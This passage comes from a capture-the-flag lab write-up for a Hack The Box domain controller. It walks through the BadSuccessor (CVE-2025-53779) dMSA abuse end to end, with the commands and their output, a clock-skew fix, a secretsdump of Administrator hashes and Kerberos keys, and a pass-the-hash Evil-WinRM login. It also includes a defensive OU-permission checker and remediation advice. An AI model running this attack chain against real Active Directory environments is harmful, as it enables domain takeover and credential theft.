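        rights = {x.strip() for x in r.get("ActiveDirectoryRights", "").split(",")}
        if not dn.upper().startswith("OU="):
            continue  # only OUs and their child-creation rights matter for this check
        if not rights & CHILD_CREATING_RIGHTS:
            continue
        if is_builtin_or_privileged_rid(r.get("SecurityIdentifier", "")):
            continue
        findings.append({
            "ou": dn,
            "principal": r.get("IdentityReferenceName", "?"),
            "sid": r.get("SecurityIdentifier", "?"),
            "rights": sorted(rights & CHILD_CREATING_RIGHTS),
            "restricted_to": r.get("ObjectAceType", "None"),  # "None" means any child class
        })
    return findings


if __name__ == "__main__":
    for f in find_ou_child_creators(parse_powerview_records(SAMPLE_OUTPUT)):
        print(f"{f['principal']} ({f['sid']}) has {','.join(f['rights'])} on {f['ou']}, "
              f"child class restriction: {f['restricted_to']}")
```

The remediation is the usual one: remove the CreateChild grant from the OU or restrict it to the specific object classes the group really needs, then re-run the check.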

Looking up what the CreateChild right on an OU allows, we came across CVE-2025-53779, aka BadSuccessor.

BadSuccessor(CVE-2025-53779)

You can read more about it here. We tried using SharpSuccessor but it didn't work as expected. BadSuccessor.ps1 did.

*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "lol2_dmsa" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'lol2_dmsa'
Object adam.scott can now impersonate Administrator

Tip
Make sure to update Impacket beforehand, as this is a fairly new attack.

We can now impersonate Administrator user!

┌──(panas㉿kalig5)-[~/Desktop/htb-labs/eighteen/attack-bins]
└─$ proxychains impacket-getST  eighteen/adam.scott:iloveyou1 -dc-ip 10.10.11.95 -impersonate "lol_dmsa$" -self -dmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

We get the clock skew error. This means we need our clock to match the server's (the victim's).

└─$ sudo timedatectl set-time "$(date -d "$(curl -s -I http://10.10.11.95 | grep -i '^Date:' | cut -d ' ' -f2-)" '+%Y-%m-%d %H:%M:%S')"
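The one-liner above reads the HTTP Date header from the box and sets our clock to it. As an added example (mine, not part of the original writeup), here is the same measurement done in Python, so the skew can be checked before Kerberos complains: the KDC answers KRB_AP_ERR_SKEW when the request timestamp is more than 5 minutes off, the Windows default for the maximum clock tolerance. The header block is a constructed sample whose Date is the server time nmap's ssl-date line reported earlier.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Windows default for "Maximum tolerance for computer clock synchronization".
KERBEROS_MAX_SKEW_SECONDS = 5 * 60

# Constructed sample: a response header block as IIS would return it.
SAMPLE_RESPONSE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Date: Sat, 10 Jan 2026 02:01:15 GMT\r\n"
    "Content-Length: 1961\r\n"
    "\r\n"
)


def server_time_from_headers(raw_headers: str) -> datetime:
    """Return the Date header (RFC 7231 fixdate, always GMT) as an aware UTC datetime."""
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "date":
            return parsedate_to_datetime(value.strip()).astimezone(timezone.utc)
    raise ValueError("no Date header in response")


def skew_seconds(raw_headers: str, local_now_iso: str) -> int:
    """Server clock minus our clock in whole seconds (positive = server is ahead).
    local_now_iso must carry a UTC offset, e.g. '2026-01-09T19:01:16+00:00',
    so that a wrong local timezone cannot masquerade as skew."""
    local_now = datetime.fromisoformat(local_now_iso)
    if local_now.tzinfo is None:
        raise ValueError("local time must be timezone-aware")
    delta = server_time_from_headers(raw_headers) - local_now.astimezone(timezone.utc)
    return round(delta.total_seconds())


def kerberos_will_reject(skew: int) -> bool:
    """True when this offset exceeds the KDC's clock tolerance."""
    return abs(skew) > KERBEROS_MAX_SKEW_SECONDS


def describe_skew(skew: int) -> str:
    sign = "+" if skew >= 0 else "-"
    return sign + str(timedelta(seconds=abs(skew)))


if __name__ == "__main__":
    s = skew_seconds(SAMPLE_RESPONSE_HEADERS, datetime.now(timezone.utc).isoformat())
    verdict = "Kerberos would reject" if kerberos_will_reject(s) else "within tolerance"
    print(f"skew {describe_skew(s)}: {verdict}")
```

With the values from the nmap output the result is +6:59:59, the same figure nmap printed as clock-skew, which is far outside the 5-minute window; a persistent offset like that on a domain member is also something a defender should be alarmed by, since Kerberos simply stops working.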

Let’s run our attack again to obtain the ticket for lol2_dmsa$.

└─$ proxychains impacket-getST  eighteen.htb/adam.scott:iloveyou1  -impersonate "lol2_dmsa$" -dc-ip 10.10.11.95 -self -dmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Impersonating lol2_dmsa$
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:4b0b61f3b184f5bc6d2da8954ddedcfab3151583491bd75c40b067ddc0e80383
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:a6b006a464556aa13606aa4913aa1b3a
[*] EncryptionTypes.rc4_hmac:40aabb572d561f64d7ae4ba428551ca4
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in lol2_dmsa$@[email protected]

Info
The attack flow of this CVE is abusing dMSAs. How? Our user has CreateChild permissions over the Staff OU, allowing the creation of a malicious dMSA object, which we abused to impersonate the Domain Administrator.

Having the ticket at our disposal we can use it to query whatever we want. We need to export it so Impacket can find it: export KRB5CCNAME='lol2_dmsa$@[email protected]'.

Administrator hash
proxychains impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip 10.10.11.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:49680  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
└─$ evil-winrm -i 10.10.11.95 -u 'EIGHTEEN\Administrator' -H 0b133be956bfaddf9cea56701affddec
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                          
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>